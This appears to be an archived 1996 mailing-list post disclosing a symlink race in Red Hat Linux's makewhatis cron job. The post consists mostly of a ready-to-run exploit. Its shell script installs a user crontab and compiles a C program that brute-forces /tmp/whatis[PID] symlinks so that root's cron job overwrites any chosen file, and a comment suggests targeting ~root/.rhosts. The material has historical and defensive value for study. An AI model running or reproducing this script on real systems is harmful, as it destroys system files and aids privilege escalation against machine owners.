[Date Prev][Date Next]   [Thread Prev][Thread Next]   [Thread Index] [Date Index] [Author Index]

Linux Redhat 4.0/3.0.3 makewhatis cron job

There is a serious problem with the makewhatis cronjob under Redhat Linux 
4.0/3.0.3.  You can use it to overwrite any file on the system.  Redhat 
is aware of the problem, and said they would have some kind of fix by 
next week which should be plenty of time before this bug is exploitable 
again.

#!/bin/sh
#
# blowitawaysam
#
# makewhatis is a shellscript that stores a tmp copy of the whatis
# database in /tmp/whatis[PID].  This is easily predictable, and even
# more easily brute forced.
#
# really silly script to blow away a file on redhat 3.0.3/4.0 system
# with makewhatis in /etc/crontab.  Severely limited as you can only
# overwrite one file a week with the whatis database.
#
# If someone is really clever, maybe they can overwrite ~root/.rhosts
# and try IP spoofing in from 'cat' as user '(1)' <smirk>
#
# Dave G.
# <daveg escape com>
# http://www.escape.com/~daveg
# 12/21/96

NUMLINKS=100 # I dont feel like guessing.  This will hit it.
             # Admittedly, it has as much style as a clumsy leper.

if [ -x /usr/bin/crontab ] ; then
   cat << ! > evil_cron
# These are for 3.0.3
19 03 * * 1 $PWD/overwrite $1 $NUMLINKS
00 04 * * 1 /bin/rm -f /tmp/whatis* $PWD/overwrite
# These are for 4.0
00 02 * * 0 $PWD/overwrite $1 $NUMLINKS
00 03 * * 0 /bin/rm -f /tmp/whatis* $PWD/overwrite
!

   /usr/bin/crontab evil_cron 2>&1 > /dev/null
   if [ $? -ne 0 ] ; then
      echo "You are in cron.deny.  Gonna have to do it yourself."
      exit 1
   fi
   

   cat << ! > overwrite.c
   #include <stdio.h>
   #include <unistd.h>

   int main(int argc, char **argv)
   {
      int i,t, really;
      pid_t sucks;
      char alot[100];

      t=atoi(argv[2]);
      sucks=getpid();
      for ( i=0 ; i<t ; i++ )
      {
         really = sucks + i;
         sprintf(alot, "/tmp/whatis%d", really); 
         symlink(argv[1], alot);
      }
   }
!
   
   cc -O6 -o overwrite overwrite.c
   chmod 755 $PWD/overwrite
   rm overwrite.c evil_cron
   
   echo Everything is set up.  Leave the program overwrite exactly where it is.
   echo now you just have to wake till sunday for 4.0 or monday for 3.0.3.
else
   echo no cron for you.
fi


Dave G.
<daveg escape com>
http://www.escape.com/~daveg
[Date Prev][Date Next]   [Thread Prev][Thread Next]   [Thread Index] [Date Index] [Author Index]